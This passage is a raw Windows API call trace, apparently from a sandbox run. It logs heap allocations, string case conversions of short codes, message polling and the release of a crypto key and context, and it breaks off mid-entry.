[0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.302] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.302] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.302] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.302] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.303] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.303] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.303] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.303] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.303] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.303] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.304] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.304] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.304] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.305] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.305] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.305] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.313] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0258.313] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.314] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0258.314] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.314] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.314] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.314] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.315] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.315] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.315] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.316] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.316] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.316] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.317] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.317] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.317] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.317] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.317] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.317] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.317] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.318] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.318] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.318] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.318] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.318] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.319] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.319] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.319] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.319] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.319] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.319] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.319] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.320] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.320] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.320] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.320] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.320] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.320] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.320] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.320] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.321] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.321] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.321] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.321] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.321] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.321] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.321] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.321] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.321] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.321] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.321] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.321] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.322] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.322] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.322] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, 